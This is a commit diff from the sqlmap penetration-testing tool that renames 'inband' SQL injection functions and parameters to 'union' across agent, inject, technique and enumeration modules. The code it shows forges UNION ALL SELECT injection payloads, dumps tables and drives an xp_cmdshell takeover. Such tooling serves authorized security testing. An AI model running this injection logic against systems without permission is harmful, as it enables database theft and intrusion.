sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-02-16 19:40:37 +03:00
Code Issues Packages Projects Releases Wiki Activity

Massive renaming (proper naming is inband = union & error techniques! - query naming stays as they are/in code things like forgeInbandQuery are renamed to forgeUnionQuery)

Browse Source
This commit is contained in:
Miroslav Stampar 2012-10-28 00:36:09 +02:00
parent a435ba6863
commit c1b8226329
16 changed files with 92 additions and 94 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
lib/controller/checks.py
View File

@ -436,7 +436,7 @@ def checkSqlInjection(place, parameter, value):
# Test for UNION injection and set the sample # Test for UNION injection and set the sample
# payload as well as the vector. # payload as well as the vector.
# NOTE: vector is set to a tuple with 6 elements, # NOTE: vector is set to a tuple with 6 elements,
# used afterwards by Agent.forgeInbandQuery() # used afterwards by Agent.forgeUnionQuery()
# method to forge the UNION query payload # method to forge the UNION query payload
configUnion(test.request.char, test.request.columns) configUnion(test.request.char, test.request.columns)

2
lib/controller/controller.py
View File

@ -133,7 +133,7 @@ def __formatInjection(inj):
if stype == PAYLOAD.TECHNIQUE.UNION: if stype == PAYLOAD.TECHNIQUE.UNION:
count = re.sub(r"(?i)(\(.+\))|(\blimit[^A-Za-z]+)", "", sdata.payload).count(',') + 1 count = re.sub(r"(?i)(\(.+\))|(\blimit[^A-Za-z]+)", "", sdata.payload).count(',') + 1
title = re.sub(r"\d+ to \d+", str(count), title) title = re.sub(r"\d+ to \d+", str(count), title)
vector = agent.forgeInbandQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6]) vector = agent.forgeUnionQuery("[QUERY]", vector[0], vector[1], vector[2], None, None, vector[5], vector[6])
if count == 1: if count == 1:
title = title.replace("columns", "column") title = title.replace("columns", "column")
elif comment: elif comment:

48
lib/core/agent.py
View File

@ -561,7 +561,7 @@ class Agent:
return concatenatedQuery return concatenatedQuery
def forgeInbandQuery(self, query, position, count, comment, prefix, suffix, char, where, multipleUnions=None, limited=False, fromTable=None): def forgeUnionQuery(self, query, position, count, comment, prefix, suffix, char, where, multipleUnions=None, limited=False, fromTable=None):
""" """
Take in input an query (pseudo query) string and return its Take in input an query (pseudo query) string and return its
processed UNION ALL SELECT query. processed UNION ALL SELECT query.
@ -602,20 +602,20 @@ class Agent:
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, ): if Backend.getIdentifiedDbms() in (DBMS.MYSQL, ):
limitOriginal = "%s " % (queries[Backend.getIdentifiedDbms()].limit.query % (0, 1)) limitOriginal = "%s " % (queries[Backend.getIdentifiedDbms()].limit.query % (0, 1))
inbandQuery = self.prefixQuery("%sUNION ALL SELECT " % limitOriginal, prefix=prefix) unionQuery = self.prefixQuery("%sUNION ALL SELECT " % limitOriginal, prefix=prefix)
if limited: if limited:
inbandQuery += ','.join(char if _ != position else '(SELECT %s)' % query for _ in xrange(0, count)) unionQuery += ','.join(char if _ != position else '(SELECT %s)' % query for _ in xrange(0, count))
inbandQuery += fromTable unionQuery += fromTable
inbandQuery = self.suffixQuery(inbandQuery, comment, suffix) unionQuery = self.suffixQuery(unionQuery, comment, suffix)
return inbandQuery return unionQuery
topNumRegex = re.search("\ATOP\s+([\d]+)\s+", query, re.I) topNumRegex = re.search("\ATOP\s+([\d]+)\s+", query, re.I)
if topNumRegex: if topNumRegex:
topNum = topNumRegex.group(1) topNum = topNumRegex.group(1)
query = query[len("TOP %s " % topNum):] query = query[len("TOP %s " % topNum):]
inbandQuery += "TOP %s " % topNum unionQuery += "TOP %s " % topNum
intoRegExp = re.search("(\s+INTO (DUMP|OUT)FILE\s+\'(.+?)\')", query, re.I) intoRegExp = re.search("(\s+INTO (DUMP|OUT)FILE\s+\'(.+?)\')", query, re.I)
@ -623,51 +623,51 @@ class Agent:
intoRegExp = intoRegExp.group(1) intoRegExp = intoRegExp.group(1)
query = query[:query.index(intoRegExp)] query = query[:query.index(intoRegExp)]
if fromTable and inbandQuery.endswith(fromTable): if fromTable and unionQuery.endswith(fromTable):
inbandQuery = inbandQuery[:-len(fromTable)] unionQuery = unionQuery[:-len(fromTable)]
for element in xrange(0, count): for element in xrange(0, count):
if element > 0: if element > 0:
inbandQuery += ',' unionQuery += ','
if element == position: if element == position:
if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "): if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "):
conditionIndex = query.index(" FROM ") conditionIndex = query.index(" FROM ")
inbandQuery += query[:conditionIndex] unionQuery += query[:conditionIndex]
else: else:
inbandQuery += query unionQuery += query
else: else:
inbandQuery += char unionQuery += char
if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "): if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "):
conditionIndex = query.index(" FROM ") conditionIndex = query.index(" FROM ")
inbandQuery += query[conditionIndex:] unionQuery += query[conditionIndex:]
if fromTable: if fromTable:
if " FROM " not in inbandQuery or "(CASE " in inbandQuery or "(IIF" in inbandQuery: if " FROM " not in unionQuery or "(CASE " in unionQuery or "(IIF" in unionQuery:
inbandQuery += fromTable unionQuery += fromTable
if intoRegExp: if intoRegExp:
inbandQuery += intoRegExp unionQuery += intoRegExp
if multipleUnions: if multipleUnions:
inbandQuery += " UNION ALL SELECT " unionQuery += " UNION ALL SELECT "
for element in xrange(count): for element in xrange(count):
if element > 0: if element > 0:
inbandQuery += ',' unionQuery += ','
if element == position: if element == position:
inbandQuery += multipleUnions unionQuery += multipleUnions
else: else:
inbandQuery += char unionQuery += char
if fromTable: if fromTable:
inbandQuery += fromTable unionQuery += fromTable
inbandQuery = self.suffixQuery(inbandQuery, comment, suffix) unionQuery = self.suffixQuery(unionQuery, comment, suffix)
return inbandQuery return unionQuery
def limitQuery(self, num, query, field=None, uniqueField=None): def limitQuery(self, num, query, field=None, uniqueField=None):
""" """

2
lib/core/common.py
View File

@ -1150,7 +1150,7 @@ def getLimitRange(count, dump=False, plusOne=False):
def parseUnionPage(page): def parseUnionPage(page):
""" """
Returns resulting items from inband query inside provided page content Returns resulting items from union query inside provided page content
""" """
if page is None: if page is None:

2
lib/core/settings.py
View File

@ -435,7 +435,7 @@ MAX_DNS_LABEL = 63
# Alphabet used for prefix and suffix strings of name resolution requests in DNS technique (excluding hexadecimal chars for not mixing with inner content) # Alphabet used for prefix and suffix strings of name resolution requests in DNS technique (excluding hexadecimal chars for not mixing with inner content)
DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.letters) DNS_BOUNDARIES_ALPHABET = re.sub("[a-fA-F]", "", string.letters)
# Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION/inband injections) # Connection chunk size (processing large responses in chunks to avoid MemoryError crashes - e.g. large table dump in full UNION injections)
MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024 MAX_CONNECTION_CHUNK_SIZE = 10 * 1024 * 1024
# Maximum response total page size (trimmed if larger) # Maximum response total page size (trimmed if larger)

14
lib/request/inject.py
View File

@ -347,9 +347,9 @@ def __goBooleanProxy(expression):
return output return output
def __goInband(expression, unpack=True, dump=False): def __goUnion(expression, unpack=True, dump=False):
""" """
Retrieve the output of a SQL query taking advantage of an inband SQL Retrieve the output of a SQL query taking advantage of an union SQL
injection vulnerability on the affected parameter. injection vulnerability on the affected parameter.
""" """
@ -360,12 +360,10 @@ def __goInband(expression, unpack=True, dump=False):
return output return output
def getValue(expression, blind=True, inband=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True): def getValue(expression, blind=True, union=True, error=True, time=True, fromUser=False, expected=None, batch=False, unpack=True, resumeValue=True, charsetType=None, firstChar=None, lastChar=None, dump=False, suppressOutput=None, expectingNone=False, safeCharEncode=True):
""" """
Called each time sqlmap inject a SQL query on the SQL injection Called each time sqlmap inject a SQL query on the SQL injection
affected parameter. It can call a function to retrieve the output affected parameter.
through inband SQL injection (if selected) and/or blind SQL injection
(if selected).
""" """
kb.safeCharEncode = safeCharEncode kb.safeCharEncode = safeCharEncode
@ -400,9 +398,9 @@ def getValue(expression, blind=True, inband=True, error=True, time=True, fromUse
query = query.replace("DISTINCT ", "") query = query.replace("DISTINCT ", "")
if not conf.forceDns: if not conf.forceDns:
if inband and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION): if union and isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
kb.technique = PAYLOAD.TECHNIQUE.UNION kb.technique = PAYLOAD.TECHNIQUE.UNION
value = __goInband(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump) value = __goUnion(forgeCaseExpression if expected == EXPECTED.BOOL else query, unpack, dump)
count += 1 count += 1
found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE found = (value is not None) or (value is None and expectingNone) or count >= MAX_TECHNIQUES_PER_VALUE

4
lib/takeover/xp_cmdshell.py
View File

@ -213,12 +213,12 @@ class xp_cmdshell:
output = inject.getValue(query, resumeValue=False, blind=False, time=False) output = inject.getValue(query, resumeValue=False, blind=False, time=False)
else: else:
output = [] output = []
count = inject.getValue("SELECT COUNT(*) FROM %s" % self.cmdTblName, resumeValue=False, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue("SELECT COUNT(*) FROM %s" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if isNumPosStrValue(count): if isNumPosStrValue(count):
for index in getLimitRange(count): for index in getLimitRange(count):
query = agent.limitQuery(index, query, self.tblField) query = agent.limitQuery(index, query, self.tblField)
output.append(inject.getValue(query, inband=False, error=False, resumeValue=False)) output.append(inject.getValue(query, union=False, error=False, resumeValue=False))
inject.goStacked("DELETE FROM %s" % self.cmdTblName) inject.goStacked("DELETE FROM %s" % self.cmdTblName)

22
lib/techniques/union/test.py
View File

@ -101,7 +101,7 @@ def __findUnionCharCount(comment, place, parameter, value, prefix, suffix, where
pages = {} pages = {}
for count in xrange(lowerCount, upperCount+1): for count in xrange(lowerCount, upperCount+1):
query = agent.forgeInbandQuery('', -1, count, comment, prefix, suffix, kb.uChar, where) query = agent.forgeUnionQuery('', -1, count, comment, prefix, suffix, kb.uChar, where)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
page, headers = Request.queryPage(payload, place=place, content=True, raise404=False) page, headers = Request.queryPage(payload, place=place, content=True, raise404=False)
if not isNullValue(kb.uChar): if not isNullValue(kb.uChar):
@ -166,7 +166,7 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL
# For each column of the table (# of NULL) perform a request using # For each column of the table (# of NULL) perform a request using
# the UNION ALL SELECT statement to test it the target url is # the UNION ALL SELECT statement to test it the target url is
# affected by an exploitable inband SQL injection vulnerability # affected by an exploitable union SQL injection vulnerability
for position in positions: for position in positions:
# Prepare expression with delimiters # Prepare expression with delimiters
randQuery = randomStr(UNION_MIN_RESPONSE_CHARS) randQuery = randomStr(UNION_MIN_RESPONSE_CHARS)
@ -174,8 +174,8 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL
randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery) randQueryProcessed = agent.concatQuery("\'%s\'" % randQuery)
randQueryUnescaped = unescaper.unescape(randQueryProcessed) randQueryUnescaped = unescaper.unescape(randQueryProcessed)
# Forge the inband SQL injection request # Forge the union SQL injection request
query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where) query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request # Perform the request
@ -196,8 +196,8 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL
randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2) randQueryProcessed2 = agent.concatQuery("\'%s\'" % randQuery2)
randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2) randQueryUnescaped2 = unescaper.unescape(randQueryProcessed2)
# Confirm that it is a full inband SQL injection # Confirm that it is a full union SQL injection
query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2) query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, multipleUnions=randQueryUnescaped2)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request # Perform the request
@ -210,7 +210,7 @@ def __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYL
fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr()) fromTable = " FROM (%s) AS %s" % (" UNION ".join("SELECT %d%s%s" % (_, FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), ""), " AS %s" % randomStr() if _ == 0 else "") for _ in xrange(LIMITED_ROWS_TEST_NUMBER)), randomStr())
# Check for limited row output # Check for limited row output
query = agent.forgeInbandQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable) query = agent.forgeUnionQuery(randQueryUnescaped, position, count, comment, prefix, suffix, kb.uChar, where, fromTable=fromTable)
payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where) payload = agent.payload(place=place, parameter=parameter, newValue=query, where=where)
# Perform the request # Perform the request
@ -239,11 +239,11 @@ def __unionConfirm(comment, place, parameter, prefix, suffix, count):
validPayload = None validPayload = None
vector = None vector = None
# Confirm the inband SQL injection and get the exact column # Confirm the union SQL injection and get the exact column
# position which can be used to extract data # position which can be used to extract data
validPayload, vector = __unionPosition(comment, place, parameter, prefix, suffix, count) validPayload, vector = __unionPosition(comment, place, parameter, prefix, suffix, count)
# Assure that the above function found the exploitable full inband # Assure that the above function found the exploitable full union
# SQL injection position # SQL injection position
if not validPayload: if not validPayload:
validPayload, vector = __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.NEGATIVE) validPayload, vector = __unionPosition(comment, place, parameter, prefix, suffix, count, where=PAYLOAD.WHERE.NEGATIVE)
@ -252,7 +252,7 @@ def __unionConfirm(comment, place, parameter, prefix, suffix, count):
def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix): def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix):
""" """
This method tests if the target url is affected by an inband This method tests if the target url is affected by an union
SQL injection vulnerability. The test is done up to 50 columns SQL injection vulnerability. The test is done up to 50 columns
on the target database table on the target database table
""" """
@ -297,7 +297,7 @@ def __unionTestByCharBruteforce(comment, place, parameter, value, prefix, suffix
def unionTest(comment, place, parameter, value, prefix, suffix): def unionTest(comment, place, parameter, value, prefix, suffix):
""" """
This method tests if the target url is affected by an inband This method tests if the target url is affected by an union
SQL injection vulnerability. The test is done up to 3*50 times SQL injection vulnerability. The test is done up to 3*50 times
""" """

14
lib/techniques/union/use.py
View File

@ -48,7 +48,7 @@ from lib.core.unescaper import unescaper
from lib.request.connect import Connect as Request from lib.request.connect import Connect as Request
def __oneShotUnionUse(expression, unpack=True, limited=False): def __oneShotUnionUse(expression, unpack=True, limited=False):
retVal = hashDBRetrieve("%s%s" % (conf.hexConvert, expression), checkConf=True) # as inband data is stored raw unconverted retVal = hashDBRetrieve("%s%s" % (conf.hexConvert, expression), checkConf=True) # as union data is stored raw unconverted
threadData = getCurrentThreadData() threadData = getCurrentThreadData()
threadData.resumed = retVal is not None threadData.resumed = retVal is not None
@ -59,10 +59,10 @@ def __oneShotUnionUse(expression, unpack=True, limited=False):
where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else None where = PAYLOAD.WHERE.NEGATIVE if conf.limitStart or conf.limitStop else None
# Forge the inband SQL injection request # Forge the union SQL injection request
vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector vector = kb.injection.data[PAYLOAD.TECHNIQUE.UNION].vector
kb.unionDuplicates = vector[7] kb.unionDuplicates = vector[7]
query = agent.forgeInbandQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited) query = agent.forgeUnionQuery(injExpression, vector[0], vector[1], vector[2], vector[3], vector[4], vector[5], vector[6], None, limited)
payload = agent.payload(newValue=query, where=where) payload = agent.payload(newValue=query, where=where)
# Perform the request # Perform the request
@ -90,7 +90,7 @@ def __oneShotUnionUse(expression, unpack=True, limited=False):
if retVal is not None: if retVal is not None:
retVal = getUnicode(retVal, kb.pageEncoding) retVal = getUnicode(retVal, kb.pageEncoding)
# Special case when DBMS is Microsoft SQL Server and error message is used as a result of inband injection # Special case when DBMS is Microsoft SQL Server and error message is used as a result of union injection
if Backend.isDbms(DBMS.MSSQL) and wasLastRequestDBMSError(): if Backend.isDbms(DBMS.MSSQL) and wasLastRequestDBMSError():
retVal = htmlunescape(retVal).replace("<br>", "\n") retVal = htmlunescape(retVal).replace("<br>", "\n")
@ -140,9 +140,9 @@ def configUnion(char=None, columns=None):
def unionUse(expression, unpack=True, dump=False): def unionUse(expression, unpack=True, dump=False):
""" """
This function tests for an inband SQL injection on the target This function tests for an union SQL injection on the target
url then call its subsidiary function to effectively perform an url then call its subsidiary function to effectively perform an
inband SQL injection on the affected url union SQL injection on the affected url
""" """
initTechnique(PAYLOAD.TECHNIQUE.UNION) initTechnique(PAYLOAD.TECHNIQUE.UNION)
@ -341,7 +341,7 @@ def unionUse(expression, unpack=True, dump=False):
kb.suppressResumeInfo = False kb.suppressResumeInfo = False
if not value and not abortedFlag: if not value and not abortedFlag:
expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) # full inband doesn't play well with ORDER BY expression = re.sub("\s*ORDER BY\s+[\w,]+", "", expression, re.I) # full union doesn't play well with ORDER BY
value = __oneShotUnionUse(expression, unpack) value = __oneShotUnionUse(expression, unpack)
duration = calculateDeltaSeconds(start) duration = calculateDeltaSeconds(start)

6
lib/utils/pivotdumptable.py
View File

@ -35,7 +35,7 @@ def pivotDumpTable(table, colList, count=None, blind=True):
if count is None: if count is None:
query = dumpNode.count % table query = dumpNode.count % table
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if blind else inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if blind else inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT)
if isinstance(count, basestring) and count.isdigit(): if isinstance(count, basestring) and count.isdigit():
count = int(count) count = int(count)
@ -65,7 +65,7 @@ def pivotDumpTable(table, colList, count=None, blind=True):
logger.info(infoMsg) logger.info(infoMsg)
query = dumpNode.count2 % (column, table) query = dumpNode.count2 % (column, table)
value = inject.getValue(query, blind=blind, inband=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) value = inject.getValue(query, blind=blind, union=not blind, error=not blind, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if isNumPosStrValue(value): if isNumPosStrValue(value):
validColumnList = True validColumnList = True
@ -110,7 +110,7 @@ def pivotDumpTable(table, colList, count=None, blind=True):
else: else:
query = dumpNode.query2 % (column, table, colList[0], pivotValue) query = dumpNode.query2 % (column, table, colList[0], pivotValue)
value = unArrayizeValue(inject.getValue(query, blind=blind, time=blind, inband=not blind, error=not blind)) value = unArrayizeValue(inject.getValue(query, blind=blind, time=blind, union=not blind, error=not blind))
if column == colList[0]: if column == colList[0]:
if isNoneValue(value): if isNoneValue(value):

12
plugins/dbms/mssqlserver/enumeration.py
View File

@ -119,7 +119,7 @@ class Enumeration(GenericEnumeration):
for query in (rootQuery.blind.count, rootQuery.blind.count2, rootQuery.blind.count3): for query in (rootQuery.blind.count, rootQuery.blind.count2, rootQuery.blind.count3):
_ = query.replace("%s", db) _ = query.replace("%s", db)
count = inject.getValue(_, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(_, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNoneValue(count): if not isNoneValue(count):
break break
@ -135,7 +135,7 @@ class Enumeration(GenericEnumeration):
for index in xrange(int(count)): for index in xrange(int(count)):
_ = (rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace("%s", db) % index _ = (rootQuery.blind.query if query == rootQuery.blind.count else rootQuery.blind.query2 if query == rootQuery.blind.count2 else rootQuery.blind.query3).replace("%s", db) % index
table = inject.getValue(_, inband=False, error=False) table = inject.getValue(_, union=False, error=False)
if not isNoneValue(table): if not isNoneValue(table):
kb.hintValue = table kb.hintValue = table
table = safeSQLIdentificatorNaming(table, True) table = safeSQLIdentificatorNaming(table, True)
@ -220,7 +220,7 @@ class Enumeration(GenericEnumeration):
query = rootQuery.blind.count query = rootQuery.blind.count
query = query.replace("%s", db) query = query.replace("%s", db)
query += " AND %s" % tblQuery query += " AND %s" % tblQuery
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
warnMsg = "no table" warnMsg = "no table"
@ -239,7 +239,7 @@ class Enumeration(GenericEnumeration):
query = query.replace("%s", db) query = query.replace("%s", db)
query += " AND %s" % tblQuery query += " AND %s" % tblQuery
query = agent.limitQuery(index, query, tblCond) query = agent.limitQuery(index, query, tblCond)
tbl = inject.getValue(query, inband=False, error=False) tbl = inject.getValue(query, union=False, error=False)
kb.hintValue = tbl kb.hintValue = tbl
foundTbls[db].append(tbl) foundTbls[db].append(tbl)
@ -367,7 +367,7 @@ class Enumeration(GenericEnumeration):
query = query % (db, db, db, db, db, db) query = query % (db, db, db, db, db, db)
query += " AND %s" % colQuery.replace("[DB]", db) query += " AND %s" % colQuery.replace("[DB]", db)
query += whereTblsQuery.replace("[DB]", db) query += whereTblsQuery.replace("[DB]", db)
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
warnMsg = "no tables contain column" warnMsg = "no tables contain column"
@ -387,7 +387,7 @@ class Enumeration(GenericEnumeration):
query += " AND %s" % colQuery.replace("[DB]", db) query += " AND %s" % colQuery.replace("[DB]", db)
query += whereTblsQuery.replace("[DB]", db) query += whereTblsQuery.replace("[DB]", db)
query = agent.limitQuery(index, query, colCond.replace("[DB]", db)) query = agent.limitQuery(index, query, colCond.replace("[DB]", db))
tbl = inject.getValue(query, inband=False, error=False) tbl = inject.getValue(query, union=False, error=False)
kb.hintValue = tbl kb.hintValue = tbl
tbl = safeSQLIdentificatorNaming(tbl, True) tbl = safeSQLIdentificatorNaming(tbl, True)

4
plugins/dbms/oracle/enumeration.py
View File

@ -119,7 +119,7 @@ class Enumeration(GenericEnumeration):
query = rootQuery.blind.count2 % queryUser query = rootQuery.blind.count2 % queryUser
else: else:
query = rootQuery.blind.count % queryUser query = rootQuery.blind.count % queryUser
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
if count != 0 and not query2: if count != 0 and not query2:
@ -145,7 +145,7 @@ class Enumeration(GenericEnumeration):
query = rootQuery.blind.query2 % (queryUser, index) query = rootQuery.blind.query2 % (queryUser, index)
else: else:
query = rootQuery.blind.query % (queryUser, index) query = rootQuery.blind.query % (queryUser, index)
role = inject.getValue(query, inband=False, error=False) role = inject.getValue(query, union=False, error=False)
# In Oracle we get the list of roles as string # In Oracle we get the list of roles as string
roles.add(role) roles.add(role)

16
plugins/generic/databases.py
View File

@ -116,7 +116,7 @@ class Databases:
query = rootQuery.blind.count2 query = rootQuery.blind.count2
else: else:
query = rootQuery.blind.count query = rootQuery.blind.count
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
errMsg = "unable to retrieve the number of databases" errMsg = "unable to retrieve the number of databases"
@ -132,7 +132,7 @@ class Databases:
query = rootQuery.blind.query2 % index query = rootQuery.blind.query2 % index
else: else:
query = rootQuery.blind.query % index query = rootQuery.blind.query % index
db = inject.getValue(query, inband=False, error=False) db = inject.getValue(query, union=False, error=False)
if db: if db:
kb.data.cachedDbs.append(safeSQLIdentificatorNaming(db)) kb.data.cachedDbs.append(safeSQLIdentificatorNaming(db))
@ -300,7 +300,7 @@ class Databases:
else: else:
query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(db) query = rootQuery.blind.count % unsafeSQLIdentificatorNaming(db)
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if count == 0: if count == 0:
warnMsg = "database '%s' " % unsafeSQLIdentificatorNaming(db) warnMsg = "database '%s' " % unsafeSQLIdentificatorNaming(db)
@ -329,7 +329,7 @@ class Databases:
else: else:
query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(db), index) query = rootQuery.blind.query % (unsafeSQLIdentificatorNaming(db), index)
table = inject.getValue(query, inband=False, error=False) table = inject.getValue(query, union=False, error=False)
if not isNoneValue(table): if not isNoneValue(table):
kb.hintValue = table kb.hintValue = table
table = safeSQLIdentificatorNaming(table, True) table = safeSQLIdentificatorNaming(table, True)
@ -593,11 +593,11 @@ class Databases:
elif Backend.isDbms(DBMS.SQLITE): elif Backend.isDbms(DBMS.SQLITE):
query = rootQuery.blind.query % tbl query = rootQuery.blind.query % tbl
value = inject.getValue(query, inband=False, error=False) value = inject.getValue(query, union=False, error=False)
parseSqliteTableSchema(value) parseSqliteTableSchema(value)
return kb.data.cachedColumns return kb.data.cachedColumns
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
if not isNumPosStrValue(count): if not isNumPosStrValue(count):
errMsg = "unable to retrieve the number of columns " errMsg = "unable to retrieve the number of columns "
@ -629,7 +629,7 @@ class Databases:
field = None field = None
query = agent.limitQuery(index, query, field, field) query = agent.limitQuery(index, query, field, field)
column = inject.getValue(query, inband=False, error=False) column = inject.getValue(query, union=False, error=False)
if not isNoneValue(column): if not isNoneValue(column):
if not onlyColNames: if not onlyColNames:
@ -643,7 +643,7 @@ class Databases:
elif Backend.isDbms(DBMS.FIREBIRD): elif Backend.isDbms(DBMS.FIREBIRD):
query = rootQuery.blind.query2 % (tbl, column) query = rootQuery.blind.query2 % (tbl, column)
colType = inject.getValue(query, inband=False, error=False) colType = inject.getValue(query, union=False, error=False)
if Backend.isDbms(DBMS.FIREBIRD): if Backend.isDbms(DBMS.FIREBIRD):
colType = FIREBIRD_TYPES.get(colType, colType) colType = FIREBIRD_TYPES.get(colType, colType)

6
plugins/generic/entries.py
View File

@ -210,7 +210,7 @@ class Entries:
else: else:
query = rootQuery.blind.count % (conf.db, tbl) query = rootQuery.blind.count % (conf.db, tbl)
count = inject.getValue(query, inband=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
lengths = {} lengths = {}
entries = {} entries = {}
@ -255,7 +255,7 @@ class Entries:
if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD: if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD:
for column in colList: for column in colList:
if inject.getValue("SELECT COUNT(%s) FROM %s" % (column, kb.dumpTable), inband=False, error=False) == '0': if inject.getValue("SELECT COUNT(%s) FROM %s" % (column, kb.dumpTable), union=False, error=False) == '0':
emptyColumns.append(column) emptyColumns.append(column)
debugMsg = "column '%s' of table '%s' will not be " % (column, kb.dumpTable) debugMsg = "column '%s' of table '%s' will not be " % (column, kb.dumpTable)
debugMsg += "dumped as it appears to be empty" debugMsg += "dumped as it appears to be empty"
@ -284,7 +284,7 @@ class Entries:
elif Backend.isDbms(DBMS.FIREBIRD): elif Backend.isDbms(DBMS.FIREBIRD):
query = rootQuery.blind.query % (index, column, tbl) query = rootQuery.blind.query % (index, column, tbl)
